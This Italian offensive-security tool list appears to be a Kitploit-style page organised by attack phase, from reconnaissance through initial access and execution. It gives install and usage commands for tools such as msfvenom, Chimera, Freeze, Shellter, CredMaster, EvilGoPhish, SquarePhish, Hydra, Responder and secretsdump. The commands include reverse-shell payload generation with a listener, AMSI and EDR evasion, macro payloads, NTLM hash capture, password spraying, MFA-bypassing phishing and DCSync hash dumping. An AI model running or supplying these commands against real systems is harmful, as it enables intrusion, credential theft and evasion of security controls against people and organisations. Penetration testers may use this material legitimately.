Shodan scansiona l'infrastruttura pubblica e la mostra in un formato ricercabile. Utilizzando un nome aziendale, un nome di dominio o un indirizzo IP, è possibile scoprire sistemi potenzialmente vulnerabili correlati al proprio target tramite shodan.

image

🔙AORT

Strumento per l'enumerazione di sottodomini, enumerazione DNS, rilevamento WAF, WHOIS, scansione porte, wayback machine, raccolta email.

Installazione:```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt

root@kitploit:~
**Utilizzo:**```python
python3 AORT.py -d google.com

immagine

🔙spoofcheck

Un programma che controlla se un dominio può essere spoofato. Il programma verifica i record SPF e DMARC per configurazioni deboli che consentono lo spoofing. Inoltre, segnalerà se il dominio ha una configurazione DMARC che invia mail o richieste HTTP su email SPF/DKIM fallite.

I domini sono spoofabili se una delle seguenti condizioni è soddisfatta:

  • Mancanza di un record SPF o DMARC
  • Il record SPF non specifica mai ~all o -all
  • La policy DMARC è impostata su p=none o è inesistente

Installazione:```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt

root@kitploit:~
**Utilizzo:**```bash
./spoofcheck.py [DOMAIN]

image

🔙AWSBucketDump

AWSBucketDump è uno strumento per enumerare rapidamente i bucket AWS S3 alla ricerca di file interessanti. È simile a un bruteforcer di sottodomini ma è realizzato specificamente per i bucket S3 e ha anche alcune funzionalità extra che consentono di eseguire grep sui file, nonché di scaricare file interessanti.

Installazione:``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt

root@kitploit:~
**Utilizzo:**```
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]

optional arguments:
  -h, --help    show this help message and exit
  -D            Download files. This requires significant diskspace
  -d            If set to 1 or True, create directories for each host w/ results
  -t THREADS    number of threads
  -l HOSTLIST
  -g GREPWORDS  Provide a wordlist to grep for
  -m MAXSIZE    Maximum file size to download.

 python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1

🔙GitHarvester

Ottimo strumento per trovare informazioni da GitHub con regex, con la capacità di cercare utenti e/o progetti specifici di GitHub.

Installazione:``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester

root@kitploit:~
**Utilizzo:**```
./githarvester.py

🔙truffleHog

TruffleHog è uno strumento che scansiona i repository git e cerca stringhe e pattern ad alta entropia che possono indicare la presenza di segreti, come password e chiavi API. Con TruffleHog puoi trovare rapidamente e facilmente informazioni sensibili che potrebbero essere state accidentalmente committate e inviate a un repository.

Installazione (Binari): Link

Installazione (Go):``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install

root@kitploit:~
**Utilizzo:**```
trufflehog https://github.com/trufflesecurity/test_keys

image

🔙Dismap

Dismap è uno strumento di scoperta e identificazione delle risorse. Può identificare rapidamente protocolli e informazioni sulle impronte digitali come web/tcp/udp, localizzare i tipi di risorse ed è adatto per reti interne ed esterne.

Dismap dispone di una base completa di regole per le impronte digitali, che attualmente include impronte digitali dei protocolli tcp/udp/tls e oltre 4500 regole per impronte web, in grado di identificare favicon, body, header, ecc.

Installazione:

Dismap è un file binario per Linux, macOS e Windows. Vai alla Release per scaricare la versione corrispondente ed eseguire:```bash

Linux or MacOS

chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h

Windows

dismap-0.3-windows-amd64.exe -h

root@kitploit:~
**Uso:**```bash
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24

# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json

# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10

# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000

image

Immagine utilizzata da https://github.com/zhzyker/dismap

🔙enum4linux

Uno strumento per enumerare informazioni da sistemi Windows e Samba.

Può essere utilizzato per raccogliere un'ampia gamma di informazioni, tra cui:

  • Informazioni sul dominio e sul controller di dominio
  • Informazioni su utenti e gruppi locali
  • Condivisioni e permessi di condivisione
  • Criteri di sicurezza
  • Informazioni su Active Directory

Installazione: (Apt)```bash sudo apt install enum4linux

root@kitploit:~
**Installazione: (Git)**```bash
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux

Utilizzo:```bash

'Do everything'

enum4linux.pl -a 192.168.2.55

Obtain list of usernames (RestrictAnonymous = 0)

enum4linux.pl -U 192.168.2.55

Obtain list of usernames (using authentication)

enum4linux.pl -u administrator -p password -U 192.168.2.55

Get a list of groups and their members

enum4linux.pl -G 192.168.2.55

Verbose scan

enum4linux.pl -v 192.168.2.55

root@kitploit:~
Le informazioni complete sull'uso si trovano in questo [blog](https://labs.portcullis.co.uk/tools/enum4linux/).

![image](https://assets.kitploit.com/production/public/readmes/147/fe00ba9f2f4658aa8611e2deabd598ed9ded034e10dca68bc7ebfcb901597d8d.png)

*Immagine usata da https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/*

### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty)

Scanner dns/network/port incredibilmente veloce, creato da [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), scritto in rust.

Avrai bisogno di un file di subdomini. *Ad es. [Wordlist di subdomini di Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*.

**Installazione:** 

Scarica l'ultima release da [qui](https://github.com/Esc4iCEscEsc/skanuvaty/releases).```bash
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists

Utilizzo:```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt

root@kitploit:~
![immagine](https://assets.kitploit.com/production/public/readmes/147/a12af6eef4cb46b200b8d1ea7e42ad172285a5263ce609aff1902ead120ec20d.png)

*Immagine usata da https://github.com/Esc4iCEscEsc/skanuvaty*

### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor)

Metabigor è uno strumento di Intelligence, il suo obiettivo è svolgere attività OSINT e altro, ma senza alcuna chiave API.

**Caratteristiche principali:**

- Ricerca di informazioni su indirizzo IP, ASN e Organizzazione.
- Wrapper per eseguire rustscan, masscan e nmap in modo più efficiente su IP/CIDR.
- Trovare più domini correlati al target applicando varie tecniche (certificato, whois, Google Analytics, ecc.).
- Ottenere un riepilogo sull'indirizzo IP (offerto da [@thebl4ckturtle](https://github.com/theblackturtle))

**Installazione:**```bash
go install github.com/j3ssie/metabigor@latest

Utilizzo:```bash

discovery IP of a company/organization

echo "company" | metabigor net --org -o /tmp/result.txt

Getting more related domains by searching for certificate info

echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command

Only run rustscan with full ports

echo '1.2.3.4/24' | metabigor scan -o result.txt

Reverse Whois to find related domains

echo 'example.com' | metabigor related -s 'whois'

Get Google Analytics ID directly from the URL

echo 'https://example.com' | metabigor related -s 'google-analytic'

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/55dd22bbf9b6790285f8373fe31c699f489c60f4541a6223af9b7cd77faf5a61.png)

*Immagine utilizzata da https://github.com/j3ssie/metabigor*

### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob)

Gitrob è uno strumento per aiutare a trovare file potenzialmente sensibili inviati a repository pubbliche su Github.

Gitrob clonerà i repository appartenenti a un utente o a un'organizzazione fino a una profondità configurabile e scorrerà la cronologia dei commit, segnalando i file che corrispondono a firme di file potenzialmente sensibili.

I risultati verranno presentati tramite un'interfaccia web per una facile navigazione e analisi.

**Nota:** *Gitrob necessita di un token di accesso Github per interagire con l'API Github. [Crea un token di accesso personale](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) e salvalo in una variabile d'ambiente nel tuo .bashrc o in un file di configurazione simile della shell:*```bash
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef

Installazione: (Go)```bash go get github.com/michenriksen/gitrob

root@kitploit:~
**Installazione: (Binario)** 

Una [versione precompilata](https://github.com/michenriksen/gitrob/releases) è disponibile per ogni release.

**Utilizzo:**```bash
# Run against org
gitrob {org_name}

# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp

# Loading session from a file
gitrob -load ~/gitrob-session.json

image

Immagine usata da https://www.uedbox.com/post/58828/

🔙gowitness

Gowitness è un'utilità per screenshot di siti web scritta in Golang, che utilizza Chrome Headless per generare screenshot di interfacce web tramite riga di comando, con un comodo visualizzatore di report per elaborare i risultati. Sono supportati sia Linux che macOS, con il supporto per Windows per lo più funzionante.

Install: (Go)```bash go install github.com/sensepost/gowitness@latest

root@kitploit:~
Informazioni complete sull'installazione si trovano [qui](https://github.com/sensepost/gowitness/wiki/Installation).

**Utilizzo:**```bash
# Screenshot a single website
gowitness single https://www.google.com/

# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20

# Screenshot open http services from an namp file
gowitness nmap -f nmap.xml --open --service-contains http

# Run the report server
gowitness report serve

Full usage information can be found here.

image

Immagine tratta da https://github.com/sensepost/gowitness

Resource Development

🔙remoteInjector

Inietta un collegamento a un modello di Word remoto in un documento Word.

Questa utility basata su Python modifica il collegamento settings.xml.rels di un file .docx verso un modello .dotm ospitato in remoto contenente una macro VBA, che viene eseguita quando il documento viene aperto e le macro sono abilitate.

Post sul blog correlato

Installazione:

root@kitploit:~
pip install remoteinjector
git clone https://github.com/JohnWoodman/remoteinjector.git
cd remoteinjector
``````bash
git clone https://github.com/JohnWoodman/remoteinjector;cd remoteinjector

Utilizzo:```bash python3 remoteinjector.py -w https://example.com/template.dotm example.docx

root@kitploit:~
### [🔙](#tool-list)[Chimera](https://github.com/tokyoneon/Chimera)

Chimera è uno script di offuscamento PowerShell progettato per bypassare AMSI e le soluzioni antivirus. Elabora script PS1 malevoli noti per attivare l'AV e utilizza la sostituzione di stringhe e la concatenazione di variabili per eludere le firme di rilevamento comuni.

**Installazione:**```bash
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help

Utilizzo:```bash ./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,
invoke-expression,out-string,write-error -j -g -k -r -p

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/054823de5ebb4c24bfff03d3e541ffcb53dfc6c74f63aa2c2702827e1916cd4f.png)

### [🔙](#tool-list)[msfvenom](https://www.offensive-security.com/metasploit-unleashed/Msfvenom/)

Msfvenom consente la creazione di payload per vari sistemi operativi in un'ampia gamma di formati. Supporta anche l'offuscamento dei payload per eludere l'antivirus.

**Configurare il Listener**```shell
use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST your-ip 
set LPORT listening-port 
run

Comandi Msfvenom

PHP:```bash msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R

root@kitploit:~
**Windows:**```bash
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe

Linux:```bash msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf

root@kitploit:~
**Java:**```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

HTA:```bash msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/28c617fe095c7c092a8f873239fdf6b30338d2c02995f1b01eb0d7d50aedebff.png)

### [🔙](#tool-list)[Shellter](https://www.shellterproject.com/)

Shellter è uno strumento di iniezione dinamica di shellcode, e il primo infettore PE veramente dinamico mai creato.

Può essere utilizzato per iniettare shellcode in applicazioni Windows native (attualmente solo applicazioni a 32 bit).

Shellter sfrutta la struttura originale del file PE e non applica alcuna modifica come la modifica dei permessi di accesso alla memoria nelle sezioni (a meno che l'utente non lo voglia), l'aggiunta di una sezione extra con accesso RWE, e tutto ciò che potrebbe sembrare sospetto sotto una scansione antivirus.

Le informazioni complete del README sono disponibili [qui](https://www.shellterproject.com/Downloads/Shellter/Readme.txt).

**Installazione: (Kali)**```bash
apt-get update
apt-get install shellter

Installazione: (Windows)

Visita la pagina di download e installa.

Utilizzo:

Basta scegliere un binario legittimo da backdoorare ed eseguire Shellter.

Alcuni utili consigli si trovano qui.

Molte demo della community sono disponibili qui.

image

Immagine usata da https://www.kali.org/tools/shellter/images/shellter.png

🔙Freeze

Freeze è uno strumento di creazione di payload utilizzato per eludere i controlli di sicurezza EDR ed eseguire shellcode in modo furtivo.

Freeze utilizza molteplici tecniche non solo per rimuovere gli hook EDR in Userland, ma anche per eseguire shellcode in modo tale da eludere altri controlli di monitoraggio degli endpoint.

Installazione:```bash git clone https://github.com/optiv/Freeze cd Freeze go build Freeze.go

root@kitploit:~
**Utilizzo:**```
  -I string
        Path to the raw 64-bit shellcode.
  -O string
        Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe.
  -console
        Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
  -encrypt
        Encrypts the shellcode using AES 256 encryption
  -export string
        For DLL Loaders Only - Specify a specific Export function for a loader to have.
  -process string
        The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe")
  -sandbox
        Enables sandbox evasion by checking:
                Is Endpoint joined to a domain?
                Does the Endpoint have more than 2 CPUs?
                Does the Endpoint have more than 4 gigs of RAM?
  -sha256
        Provides the SHA256 value of the loaders (This is useful for tracking)

immagine

Immagine usata da https://www.blackhatethicalhacking.com/tools/freeze/

🔙WordSteal

Questo script creerà un documento Microsoft Word con un'immagine remota, consentendo la cattura di hash NTML da un endpoint vittima remoto.

Microsoft Word ha la capacità di includere immagini da posizioni remote, inclusa un'immagine remota ospitata su un server SMB controllato dall'attaccante. Questo ti dà l'opportunità di ascoltare e catturare gli hash NTLM che vengono inviati quando una vittima autenticata apre il documento Word e renderizza l'immagine.

Installazione:``` git clone https://github.com/0x09AL/WordSteal cd WordSteal

root@kitploit:~
**Uso:**```bash
# Generate document containing 'test.jpg' and start listener
./main.py 127.0.0.1 test.jpg 1

# Generate document containing 'test.jpg' and do not start listener
./main.py 127.0.0.1 test.jpg 0\n

image

Immagine utilizzata da https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/

🔙Funzioni NTAPI non documentate

Questo sito fornisce informazioni su interni di Windows non documentati, chiamate di sistema, strutture dati e altri dettagli di basso livello del sistema operativo Windows.

Può essere una risorsa preziosa per chi desidera esplorare gli interni di Windows per vari scopi, tra cui analisi delle vulnerabilità, sviluppo di exploit ed escalation dei privilegi.

Nello sviluppo di exploit, comprendere gli interni del sistema target è cruciale. Questo sito può aiutare a sviluppare exploit sfruttando gli aspetti non documentati di basso livello di Windows.

Utilizzo:

Visita http://undocumented.ntinternals.net/

image

Immagine utilizzata da http://undocumented.ntinternals.net/

🔙Funzioni di callback del kernel

Questa nota tecnica fornisce un elenco completo di tutte le API esportate dal kernel di Windows, per consentire agli sviluppatori di driver di registrare routine di callback che vengono invocate dai componenti del kernel in varie circostanze.

La maggior parte di queste routine sono documentate nel Windows Driver Kit (WDK), ma alcune sono destinate all'uso da parte dei driver in-box.

Le funzioni non documentate sono descritte brevemente, mentre quelle documentate sono solo elencate qui come riferimento.

Utilizzo:

Visita https://codemachine.com/articles/kernel_callback_functions.html

image

Immagine utilizzata da https://codemachine.com

🔙OffensiveVBA

Una raccolta di tecniche offensive, script e link utili per ottenere l'esecuzione di codice e l'evasione delle difese tramite macro di Office.

Utilizzo:

Visita https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo

image

Immagine utilizzata da https://github.com/S3cur3Th1sSh1t

🔙WSH

Creazione del payload:```vbs Set shell = WScript.CreateObject("Wscript.Shell") shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

root@kitploit:~
**Esegui:**```bash
wscript payload.vbs
cscript.exe payload.vbs
wscript /e:VBScript payload.txt //If .vbs files are blacklisted

🔙HTA

Creazione del payload:```html

``` **Esegui:** Esegui file

🔙VBA

Creazione payload:```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub

root@kitploit:~
**Esecuzione:** Impostare la funzione su Auto_Open() nel documento con macro abilitate

Accesso Iniziale
====================

### [🔙](#tool-list)[CredMaster](https://github.com/knavesec/CredMaster)

Lancia un attacco di password spray / brute force tramite proxy di passaggio Amazon AWS, cambiando l'indirizzo IP di richiesta per ogni tentativo di autenticazione. Questo crea dinamicamente API FireProx per spray di password più evasivi.

CredMaster fornisce un metodo per eseguire spray di password anonimi contro endpoint in uno strumento semplice e facile da usare. Lo strumento FireProx fornisce l'IP di richiesta rotante, mentre la base di CredMaster falsifica tutte le altre informazioni identificative.

Caratteristiche:
- Supporto completo per tutte le regioni AWS
- Genera automaticamente API per il pass-through del proxy
- Falsifica i numeri di tracciamento API, gli IP forwarded-for e altre intestazioni di tracciamento proxy
- Elaborazione multi-thread
- Contatori di ritardo password e configurazione per elusione della politica di blocco
- Aggiungi facilmente nuovi plugin
- Completamente anonimo

**Installazione:**```bash
git clone https://github.com/knavesec/CredMaster;cd CredMaster;pip install -r requirements.txt

Per le istruzioni complete di installazione vedi qui.

Utilizzo:```bash python3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs} python3 credmaster.py --config config.json

root@kitploit:~
Questo strumento richiede chiavi di accesso API AWS; una guida su come acquisire queste chiavi può essere trovata qui: https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b

![credmaster](https://assets.kitploit.com/production/public/readmes/147/0b3b39000bca40b701781836c94d98cc1efa1c23783a2344bfbf30fde4293d4a.png)

*Immagine tratta da https://github.com/knavesec/CredMaster/wiki*

### [🔙](#elenco-strumenti)[TREVORspray](https://github.com/blacklanternsecurity/TREVORspray)

TREVORspray è uno sprayer di password modulare con threading, proxy SSH, moduli di loot e molto altro!

**Installazione:**```bash
pip install https://github.com/blacklanternsecurity/TREVORspray

Utilizzo:```bash

Recon

python3 ./trevorspray --recon evilcorp.com

Enumerate users via OneDrive

python3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10

Spray against discovered

python3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token

root@kitploit:~
Per istruzioni complete sull'uso vedi [qui](https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365).

![TREVORspray](https://assets.kitploit.com/production/public/readmes/147/7663363d4be94c22481a92a86f36f1777a8f9c4d85ad76ca3df5ee09096deb09.png)

*Immagine usata da https://github.com/blacklanternsecurity/TREVORspray*

### [🔙](#tool-list)[evilqr](https://github.com/kgretzky/evilqr)

Toolkit che dimostra un altro approccio dell'attacco QRLJacking, permettendo di eseguire il takeover remoto dell'account tramite phishing del codice QR di accesso.

Consiste in un'estensione del browser utilizzata dall'attaccante per estrarre il codice QR di accesso e un'applicazione server che recupera i codici QR di accesso per visualizzarli sulle pagine di phishing ospitate.

Demo [video](https://www.youtube.com/watch?v=8pfodWzqMcU)

**Installazione: (Estensione)** 

Puoi caricare l'estensione in Chrome tramite la funzionalità `Load unpacked`:
https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked

Una volta installata l'estensione, assicurati di fissare la sua icona nella barra delle estensioni di Chrome, in modo che sia sempre visibile.

**Installazione: (Server)**```bash
git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat

Utilizzo:

  1. Esegui il server eseguendo il binario del server compilato: ./server/build/evilqr-server
  2. Apri uno qualsiasi dei siti web supportati nel tuo browser Chrome, con l'estensione Evil QR installata:``` https://discord.com/login https://web.telegram.org/k/ https://whatsapp.com https://store.steampowered.com/login/ https://accounts.binance.com/en/login https://www.tiktok.com/login
root@kitploit:~
3. Assicurati che il codice QR di accesso sia visibile e clicca sull'icona dell'estensione **Evil QR** nella barra degli strumenti. Se il codice QR viene riconosciuto, l'icona dovrebbe illuminarsi a colori.
4. Apri l'URL della pagina di phishing del server: `http://127.0.0.1:35000` (predefinito)

![evilqr](https://assets.kitploit.com/production/public/readmes/147/f8ff7150038690a1c6608be4071593f736ccb4369d43ebc0af44791c020e2b15.png)

*Immagine presa da https://breakdev.org/evilqr-phishing/*

### [🔙](#tool-list)[CUPP](https://github.com/Mebus/cupp)

La forma più comune di autenticazione è la combinazione di un nome utente e una password o frase segreta. Le password possono talvolta essere indovinate profilando l'utente, come un compleanno, soprannome, indirizzo, nome di un animale domestico o parente, o una parola comune come Dio, amore, denaro o password.

Ecco perché è nato CUPP.

**Installazione:**```bash
git clone https://github.com/Mebus/cupp;cd cupp

Utilizzo:```bash

Run in interactive mode

python3 ./cupp.py -i

root@kitploit:~
![cupp](https://assets.kitploit.com/production/public/readmes/147/1c9d63a8d34972498c7a267463fc4233869f68059aee885a2b88ce276cfffffb.png)

*Immagine utilizzata da https://github.com/Mebus/cupp*

### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny)

Bash Bunny è uno strumento fisico di attacco USB e un sistema di distribuzione di payload multifunzione. È progettato per essere collegato alla porta USB di un computer e può essere programmato per eseguire varie funzioni, tra cui la manipolazione e l'esfiltrazione di dati, l'installazione di malware e l'elusione delle misure di sicurezza.

[hackinglab: Bash Bunny – Guida](https://hackinglab.cz/en/blog/bash-bunny-guide/)

[Hak5 Documentazione](https://docs.hak5.org/bash-bunny/)

[Bel Repository di Payload](https://github.com/hak5/bashbunny-payloads)

[Pagina del Prodotto](https://hak5.org/products/bash-bunny)

![immagine](https://assets.kitploit.com/production/public/readmes/147/a9fc36ccc8742ad176a0455fea6a50a355f6a873f99ab472c3b81989c3093b66.png)

### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish)

evilginx2 + gophish. (GoPhish) Gophish è un potente framework di phishing open-source che semplifica la verifica dell'esposizione della tua organizzazione agli attacchi di phishing. (evilginx2) Framework autonomo per attacchi man-in-the-middle utilizzato per rubare credenziali di accesso insieme ai cookie di sessione, consentendo di bypassare l'autenticazione a due fattori.

**Installazione:**```bash
git clone https://github.com/fin3ss3g0d/evilgophish

Utilizzo:``` Usage: ./setup <subdomain(s)>

  • root domain - the root domain to be used for the campaign
  • subdomains - a space separated list of evilginx2 subdomains, can be one if only one
  • root domain bool - true or false to proxy root domain to evilginx2
  • redirect url - URL to redirect unauthorized Apache requests
  • feed bool - true or false if you plan to use the live feed
  • rid replacement - replace the gophish default "rid" in phishing URLs with this value
  • blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/d21f6533174ab65dbb6ec6fc044fdad87fe0654f01a6be5f17a862588bf9a0ec.png)

### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit)

Questo framework è ottimo per creare campagne per l'accesso iniziale, 'SET ha una serie di vettori di attacco personalizzati che ti permettono di creare un attacco credibile rapidamente'.

**Installazione:**```bash
git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install

Utilizzo:```bash python3 setoolkit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/962be1664db4237288b6ac2bf77cb98be8c69715d67efdc36178eb16e8178e1c.png)

### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra)

Ottimo strumento per attacchi di forza bruta su login. Può eseguire brute force su diversi servizi come SSH, FTP, TELNET, HTTP ecc.

**Installazione:**```bash
sudo apt install hydra

Uso:```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/c1f8846e81658f9a3679da0ff42c1efc12d30861a6a706c61449b956e14f8417.png)

### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)

SquarePhish è uno strumento di phishing avanzato che utilizza una tecnica che combina il flusso di autenticazione tramite codice OAuth Device e i codici QR (vedi [PhishInSuits](https://github.com/secureworks/PhishInSuits) per maggiori informazioni sul flusso OAuth Device Code negli attacchi di phishing).

Fasi dell'attacco:

- Inviare il codice QR malevolo alla vittima
- La vittima scansiona il codice QR con il dispositivo mobile
- La vittima viene reindirizzata a un server controllato dall'attaccante (attivando il processo di autenticazione OAuth Device Code)
- Alla vittima viene inviato via email il codice MFA (attivando il timer di 15 minuti del flusso OAuth Device Code)
- L'attaccante interroga l'autenticazione
- La vittima inserisce il codice nel sito Microsoft legittimo
- L'attaccante salva il token di autenticazione

**Installazione:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

Nota: Prima di utilizzare uno dei due moduli, aggiorna le informazioni richieste nel file settings.config indicate con Required.

Utilizzo (Modulo Email):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments: -h, --help show this help message and exit

-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL victim email address to send initial QR code email to

root@kitploit:~
**Utilizzo (Modulo Server):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

🔙King Phisher

King Phisher è uno strumento che permette agli attaccanti di creare e inviare email di phishing alle vittime per ottenere informazioni sensibili.

Include funzionalità come template personalizzabili, gestione delle campagne e capacità di invio email, rendendolo uno strumento potente e facile da usare per condurre attacchi di phishing. Con King Phisher, gli attaccanti possono prendere di mira individui o organizzazioni con email di phishing mirate e convincenti, aumentando le possibilità di successo nei loro attacchi.

Installazione (Linux - Client & Server):```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh

root@kitploit:~
**Utilizzo:**

Una volta installato King Phisher, segui la [pagina wiki](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) per configurare SSH, il database, il server SMTP, ecc.

![image](https://assets.kitploit.com/production/public/readmes/147/ab8900f24709e60727b9ae8d91dc00da72eb17a099da35552cfd09ad542e20b5.png)

Esecuzione
====================

### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responder è uno strumento per avvelenare i protocolli LLMNR e NBT-NS su una rete, per consentire la cattura di credenziali e l'esecuzione di codice arbitrario.

I protocolli LLMNR (Link-Local Multicast Name Resolution) e NBT-NS (NetBIOS Name Service) sono utilizzati dai sistemi Windows per risolvere i nomi host in indirizzi IP su una rete locale. Se un nome host non può essere risolto usando questi protocolli, il sistema invierà una richiesta broadcast per il nome host sulla rete locale.

Responder ascolta questi broadcast e risponde con un indirizzo IP falso, ingannando il sistema richiedente in modo che invii le sue credenziali all'attaccante.

**Installazione:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

Utilizzo:```bash

Running the tool

./Responder.py [options]

Typical usage

./Responder.py -I eth0 -wrf

root@kitploit:~
Informazioni complete sull'utilizzo si trovano [qui](https://github.com/SpiderLabs/Responder#usage).

![image](https://assets.kitploit.com/production/public/readmes/147/1557d2d9375fcf140ae01d21311d11ce93eabb676e40f6eb39ec25e0f4959c12.png)

*Immagine utilizzata da https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/*

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

Un'utilità che fa parte della libreria Impacket e può essere utilizzata per estrarre hash di password e altri segreti da un sistema Windows.

Lo fa interagendo con il database Security Account Manager (SAM) del sistema ed estraendo gli hash delle password e altre informazioni, come:

- Hash di password per account locali
- Ticket e chiavi Kerberos
- LSA Secrets

**Install:**```bash
python3 -m pip install impacket

Utilizzo:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/147/e9e242c346297388c540da63c467f568ea0b33980e52d48bd8154d745147f192.png)

*Immagine utilizzata da https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy*

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM è uno strumento che fornisce un'interfaccia a riga di comando per Windows Remote Management (WinRM: *Un servizio che consente agli amministratori di eseguire comandi in remoto su una macchina Windows*).

Evil-WinRM consente a un attaccante di connettersi in remoto a una macchina Windows utilizzando WinRM ed eseguire comandi arbitrari.

Alcune funzionalità includono:

- Caricamento in memoria di script Powershell
- Caricamento in memoria di file dll bypassando alcuni AV
- Caricamento di payload x64
- Supporto Pass-the-hash
- Caricamento e download di file locali e remoti

**Installazione: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Installa: (Ruby gem)```bash gem install evil-winrm

root@kitploit:~
